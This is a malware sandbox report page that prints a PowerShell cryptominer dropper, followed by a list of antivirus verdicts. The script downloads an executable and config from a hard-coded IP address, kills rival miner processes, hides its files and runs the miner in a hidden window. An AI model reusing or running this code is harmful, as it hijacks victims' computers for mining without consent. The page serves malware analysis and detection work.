Static | ZeroBOX
No static analysis available.
$ne = $MyInvocation.MyCommand.Path
$miner_url = "http://121.190.90.250:8081/js/s.rar"
$miner_name = "javas"
$miner_cfg_url = "http://121.190.90.250:8081/js/3/config.json"
$miner_cfg_name = "config.json"
$miner_path = "$env:TMP\javas.exe"
$miner_cfg_path = "$env:TMP\config.json"
function Update($url,$path,$proc_name)
{
Get-Process -Name $proc_name | Stop-Process
Remove-Item $path
Try {
$vc = New-Object System.Net.WebClient
$vc.DownloadFile($url,$path)
Catch {
Write-Output "donwload with backurl"
cmd /c taskkill /f /im dsm.exe
cmd /c taskkill /f /im dom.exe
cmd /c del /f /q C:\Windows\System32\config\systemprofile\dom\*
cmd /c taskkill /f /im WindowsUpdate.exe
cmd /c del /f /q C:\Windows\temp\WindowsUpdate.exe
if(!(Get-Process $miner_name -ErrorAction SilentlyContinue))
cmd.exe /c attrib -s -h -r %tmp%\config.json
cmd.exe /c attrib -s -h -r C:\Windows\temp\config.json
cmd.exe /c rd /s /q %tmp%\config.json
cmd.exe /c rd /s /q C:\Windows\temp\config.json
Update $miner_url $miner_path $miner_name
Update $miner_cfg_url $miner_cfg_path $miner_cfg_name
cmd.exe /c attrib +R +S +H %tmp%\config.json
cmd.exe /c attrib +R +S +H C:\Windows\temp\config.json
Start-Process $miner_path -windowstyle hidden
Write-Output "Miner Running"
##Start-Process cmd.exe "/c $killmodule_path" -windowstyle hidden
cmd /c taskkill /f /im shella.exe
Antivirus Signature
Bkav Clean
Lionic Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
Skyhigh Clean
ALYac Clean
Malwarebytes Clean
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Arcabit Trojan.Generic.D4375843
BitDefenderTheta Clean
VirIT Clean
Symantec Scr.Malcode!gen
ESET-NOD32 PowerShell/CoinMiner.BW
TrendMicro-HouseCall Clean
Avast Clean
Cynet Malicious (score: 99)
Kaspersky HEUR:Trojan.Script.Generic
BitDefender Trojan.GenericKD.70735939
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Trojan.GenericKD.70735939
Rising Clean
TACHYON Clean
Emsisoft Trojan.GenericKD.70735939 (B)
Baidu Clean
F-Secure Trojan.TR/PShell.Miner.G
DrWeb PowerShell.DownLoader.1760
VIPRE Trojan.GenericKD.70735939
TrendMicro Clean
FireEye Trojan.GenericKD.70735939
Sophos Clean
Jiangmin Clean
Varist Clean
Avira TR/PShell.Miner.G
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Microsoft Clean
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.Script.Generic
GData Script.Trojan.Agent.50Q0HJ
Google Detected
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
MAX malware (ai score=87)
VBA32 Clean
Zoner Clean
Tencent Script.Trojan.Generic.Kqil
Yandex Clean
Ikarus Trojan.PowerShell.Coinminer
MaxSecure Clean
Fortinet Clean
AVG Clean
Panda Clean
No IRMA results available.